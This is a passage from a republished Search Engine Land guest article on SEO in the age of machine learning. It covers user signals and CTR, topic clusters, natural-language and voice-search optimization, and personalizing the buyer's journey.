One of the best ways that a search engine can determine user intent is by analyzing user signals, which it gathers through its Chrome browser, direct URLs, SERPs and so on. But Google’s most valued user signal remains CTR.
To ensure your web pages deliver good user signals, you must create a solid UX foundation. This means providing thematic continuity across your web pages, creating high-quality and relevant landing pages, using engaging images, offering interactive content, delivering fast page speed and developing an organized internal linking structure.
Metatags and rich snippets can also influence your click-through rate, so optimize for both. Google will obviously lower your rank if your website suffers from a low CTR in a high-ranking result.
Other considerations to keep in mind include:
employing 301 redirects for missing pages and rel=canonical tags for duplicate content.
optimizing structured data and alternative tags to help search engines index content.
resolving any broken links that could affect crawl structure.
Even though Google’s AI and RankBrain are incredibly advanced, Google still needs your help to crawl web pages and index them. It doesn’t hurt that these factors also improve your website’s navigation and user experience.
2. Embrace thematic continuity
Despite all of these advancements in search, I still commonly encounter clients who operate their websites with thin content and no keyword focus. My team begins client campaigns with research on keywords, competitors and some technical aspects.
Recently, though, we began focusing on creating more seamless hierarchical structures that leverage semantically linked keywords and topic clusters to promote an awesome UX. As opposed to simply creating content with a limited keyword focus, we focused on ranking our clients’ most important pages.
HubSpot refers to this exciting new practice as “topic clusters.” Topic clusters focus on pillar pages that represent your most important topics. These will be broad, overarching pages that rank high in your information hierarchy and attempt to discuss and answer the most important questions related to your main topic.
Subtopics are then discussed in greater detail on lower-hierarchy pages that contain internal links back to the pillar page. This strategy helps communicate your most important pages through a sophisticated interlinking structure, promotes seamless navigation and helps position your pillar page to rank for multiple keyword phrases.
These evergreen pieces are also supplemented by a consistent blogging strategy that discusses trending topics related to the website’s theme. Each piece of content produced is actionable and focuses on driving conversion or desired actions.
When modeling each piece of content, it’s important to ask yourself this question: What are the problems this piece of content is seeking to address, and how will it solve them? As more questions pop up, write content addressing these issues. Now you’ve created a website that satisfies user intent from almost every possible perspective. This helps you rank for a lot of keywords.
You can also employ machine learning technology to improve the workflow of your content marketing campaign. Applications, such as the Hemingway App and Grammarly, are excellent tools that can provide suggestions where improvements could be made in sentence structure, author voice and word usage.
3. Employ natural language
Perhaps the best way to optimize for an artificially intelligent search world is to optimize for voice search, as opposed to text search. This involves optimizing your website for mobile and your content to achieve featured snippets, given that answers to questions asked to a personal assistant device are pulled from the featured snippet field on a Google SERP.
In addition to following the strategies outlined thus far, this involves crafting cogent page copy that seeks to answer as many questions as possible and provide actionable solutions.
Research has also shown that people searching by voice, rather than text, are more likely to use search phrases from four to nine words in length. This means you need to optimize for long-tail keyword phrases — which are usually longer in length — and page copy that is more representative of natural language. For example, a text search for flights to Hawaii may be “cheap flights Hawaii,” while a voice search may say, “What are the cheapest flights to Hawaii?”
With the rise of machine learning, optimized content that appeals to natural language could satisfy user intent for both broad match searches over text and long-tail voice searches.
Consider how chatbot assistants incorporate Natural Language Understanding (NLU) to more readily understand linguistic syntax and meanings. With advancements in NLU applications, search engines will eventually be able to entirely assess the meaning and quality of content the same way a human does.
4. Personalize the buyer’s journey
With more big data being created this year than in the past 5,000 years, businesses will need to leverage machine learning technology to interpret vast amounts of user data at an unprecedented speed.
One way this is already being executed is by mining conversational text data from chatbots. As we move from a graphical interface world into a conversational interface, chatbots are being used to map inputs and data from customer journeys to help companies improve their user experience.
This technology is still in its infancy, but we can also apply machine learning technology and data mining to personalize touch points along the buyer’s journey. Customer journey mapping can be used to build out buyer personas and personalize marketing touch points to maximize conversions and sales.
Using customer journey mapping, businesses can personalize touch points to deliver content or advertisements when intent is highest. Real-time responses can be instituted to respond to customer service calls immediately, deliver calls to action to high-scoring leads and segment advertisement campaigns based on real-time data.
Predictive analytics can also be applied to deliver predictions of estimated campaign performances based on real-time data. This will greatly save time on A/B testing and improve campaign efficiency.
Fortunately, machine learning technology can be used by anyone. Given the sheer speed and scale of machine learning applications, relying on conventional SEO strategies to rank organically may eventually put you at an incredible competitive disadvantage.
The future is already passing
Don’t worry, automation won’t totally displace humans any time soon. Machine learning technologies can help augment marketing campaigns, but the creative and execution ultimately rely on the expertise of human intelligence. But we will probably reach a point soon enough that clients will actively seek out digital marketing firms that have expertise in customer journey mapping and AI-enabled applications.
In my opinion, these technologies have the potential to greatly improve the competition for SERPs and will also allow digital marketers to deliver a stronger product.
Some opinions expressed in this article may be those of a guest author and not necessarily Search Engine Land. Staff authors are listed here.
Source
https://searchengineland.com/machine-learning-levels-serp-playing-field-284073
0 notes
Last Seen Blogs
twinkrevali-moved
MOVED
parendee
ஐPârende
sparsh341
Untitled
without-ado
Welcome you!
shakunetsu-doujin
DB doujinshi scanlations.